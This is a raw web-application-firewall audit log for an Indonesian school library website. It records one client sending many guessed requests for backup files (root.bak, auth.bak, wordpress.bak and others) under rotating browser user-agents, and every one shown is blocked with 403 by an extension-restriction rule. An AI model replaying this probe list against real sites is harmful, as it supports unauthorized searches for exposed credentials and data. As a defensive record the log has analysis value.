Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d0b73530-Z-- --f430223f-A-- [20/May/2025:02:33:21 +0700] aCuHgTuVdcwZ_qZ5ZIonsAAAAAk 103.236.140.4 59352 103.236.140.4 8181 --f430223f-B-- GET /jsp.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (X11; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.92 Safari/537.36 OPR/55.0.2994.44 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 127580987 --f430223f-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --f430223f-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683201330075 1748 (- - -) Stopwatch2: 1747683201330075 1748; combined=639, p1=375, p2=242, p3=0, p4=0, p5=22, sr=87, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f430223f-Z-- --4448654d-A-- [20/May/2025:02:33:21 +0700] aCuHgWyGBQNQTJej4E5_YAAAAIw 103.236.140.4 59877 103.236.140.4 8181 --4448654d-B-- GET /2014.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 162955273 --4448654d-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --4448654d-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683201342902 1923 (- - -) Stopwatch2: 1747683201342902 1923; combined=727, p1=344, p2=348, p3=0, p4=0, p5=35, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4448654d-Z-- --2fb6b255-A-- [20/May/2025:02:33:21 +0700] aCuHgb8BMImlI6dyVeOFawAAANc 103.236.140.4 59826 103.236.140.4 8181 --2fb6b255-B-- GET /erpustakaan.backup HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (X11; Linux i686 on x86_64; rv:60.2.0) Gecko/20100101 Firefox/60.2.0 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 100177673 --2fb6b255-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --2fb6b255-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".backup"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683201479976 11189 (- - -) Stopwatch2: 1747683201479976 11189; combined=9706, p1=597, p2=9078, p3=0, p4=0, p5=31, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2fb6b255-Z-- --edeeb621-A-- [20/May/2025:02:33:21 +0700] aCuHgWyGBQNQTJej4E5_aQAAAJg 103.236.140.4 59844 103.236.140.4 8181 --edeeb621-B-- GET /auth.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.67 Safari/537.36 OPR/56.0.3051.99 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 164210714 --edeeb621-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --edeeb621-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683201485229 8319 (- - -) Stopwatch2: 1747683201485229 8319; combined=3480, p1=540, p2=2912, p3=0, p4=0, p5=28, sr=167, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --edeeb621-Z-- --2e5e877d-A-- [20/May/2025:02:33:21 +0700] aCuHgWyGBQNQTJej4E5_dgAAAIw 103.236.140.4 59602 103.236.140.4 8181 --2e5e877d-B-- GET /2020.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 70844461 --2e5e877d-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --2e5e877d-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683201492030 2269 (- - -) Stopwatch2: 1747683201492030 2269; combined=876, p1=326, p2=457, p3=0, p4=0, p5=61, sr=83, sw=32, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2e5e877d-Z-- --7abafa27-A-- [20/May/2025:02:33:21 +0700] aCuHgb8BMImlI6dyVeOFewAAANA 103.236.140.4 59764 103.236.140.4 8181 --7abafa27-B-- GET /html.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770 Safari/537.36 OPR/57.0.3098.116 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 167280646 --7abafa27-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --7abafa27-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683201489076 14601 (- - -) Stopwatch2: 1747683201489076 14601; combined=5935, p1=1361, p2=4538, p3=0, p4=0, p5=35, sr=101, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7abafa27-Z-- --9800bb61-A-- [20/May/2025:02:33:21 +0700] aCuHgTuVdcwZ_qZ5ZIonzwAAAAc 103.236.140.4 59692 103.236.140.4 8181 --9800bb61-B-- GET /2011.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 155287579 --9800bb61-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --9800bb61-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683201493896 9987 (- - -) Stopwatch2: 1747683201493896 9987; combined=1222, p1=558, p2=624, p3=0, p4=0, p5=39, sr=83, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9800bb61-Z-- --ac46af19-A-- [20/May/2025:02:33:21 +0700] aCuHgWyGBQNQTJej4E5_fAAAAII 103.236.140.4 59820 103.236.140.4 8181 --ac46af19-B-- GET /master.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:55.0.3) Gecko/20100101 Firefox/55.0.3 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 162496536 --ac46af19-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --ac46af19-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683201496059 8002 (- - -) Stopwatch2: 1747683201496059 8002; combined=982, p1=358, p2=595, p3=0, p4=0, p5=29, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ac46af19-Z-- --97c9c573-A-- [20/May/2025:02:33:21 +0700] aCuHgQZaP57SewDBUi9n3QAAAEg 103.236.140.4 59854 103.236.140.4 8181 --97c9c573-B-- GET /asp.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 73531434 --97c9c573-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --97c9c573-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683201493598 10655 (- - -) Stopwatch2: 1747683201493598 10655; combined=704, p1=364, p2=313, p3=0, p4=0, p5=26, sr=81, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --97c9c573-Z-- --6c3d0407-A-- [20/May/2025:02:33:21 +0700] aCuHgWyGBQNQTJej4E5_fgAAAI4 103.236.140.4 60860 103.236.140.4 8181 --6c3d0407-B-- GET /2023.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:67.0.2) Gecko/20100101 Firefox/67.0.2 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 163545866 --6c3d0407-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --6c3d0407-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683201497794 6656 (- - -) Stopwatch2: 1747683201497794 6656; combined=760, p1=410, p2=322, p3=0, p4=0, p5=28, sr=103, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6c3d0407-Z-- --a67df47a-A-- [20/May/2025:02:33:21 +0700] aCuHgWyGBQNQTJej4E5_hgAAAJA 103.236.140.4 59872 103.236.140.4 8181 --a67df47a-B-- GET /index.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.92 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 159128051 --a67df47a-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --a67df47a-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683201500927 3699 (- - -) Stopwatch2: 1747683201500927 3699; combined=697, p1=349, p2=321, p3=0, p4=0, p5=27, sr=70, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a67df47a-Z-- --1cc2e569-A-- [20/May/2025:02:33:21 +0700] aCuHgWyGBQNQTJej4E5_hwAAAIs 103.236.140.4 59606 103.236.140.4 8181 --1cc2e569-B-- GET /wordpress.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36 OPR/56.0.3051.52 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 153813016 --1cc2e569-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --1cc2e569-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683201495882 8921 (- - -) Stopwatch2: 1747683201495882 8921; combined=719, p1=361, p2=332, p3=0, p4=0, p5=26, sr=69, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1cc2e569-Z-- --6b7b8f40-A-- [20/May/2025:02:33:21 +0700] aCuHgb8BMImlI6dyVeOFfwAAANU 103.236.140.4 58882 103.236.140.4 8181 --6b7b8f40-B-- GET /test.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.79 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 118390814 --6b7b8f40-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --6b7b8f40-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683201490607 17976 (- - -) Stopwatch2: 1747683201490607 17976; combined=717, p1=329, p2=348, p3=0, p4=0, p5=39, sr=66, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6b7b8f40-Z-- --5758e760-A-- [20/May/2025:02:33:21 +0700] aCuHgTuVdcwZ_qZ5ZIon4QAAABE 103.236.140.4 60834 103.236.140.4 8181 --5758e760-B-- GET /root.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (X11; Linux i686 on x86_64; rv:60.0.1) Gecko/20100101 Firefox/60.0.1 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 165806086 --5758e760-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --5758e760-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683201506000 9639 (- - -) Stopwatch2: 1747683201506000 9639; combined=1421, p1=987, p2=400, p3=0, p4=0, p5=33, sr=86, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5758e760-Z-- --1a917a1c-A-- [20/May/2025:02:33:21 +0700] aCuHgQZaP57SewDBUi9n7wAAAFQ 103.236.140.4 59860 103.236.140.4 8181 --1a917a1c-B-- GET /vb.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.81 Safari/537.36 OPR/55.0.2994.47 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 119046198 --1a917a1c-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --1a917a1c-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683201497622 18210 (- - -) Stopwatch2: 1747683201497622 18210; combined=669, p1=320, p2=330, p3=0, p4=0, p5=19, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1a917a1c-Z-- --b32c5a26-A-- [20/May/2025:02:33:21 +0700] aCuHgQZaP57SewDBUi9n_AAAAEU 103.236.140.4 59804 103.236.140.4 8181 --b32c5a26-B-- GET /erpustakaan.smkn22jakarta.sch.id.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.84 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 166920201 --b32c5a26-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --b32c5a26-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".smkn22jakarta.sch.id.bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683201514336 2246 (- - -) Stopwatch2: 1747683201514336 2246; combined=876, p1=421, p2=424, p3=0, p4=0, p5=31, sr=81, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
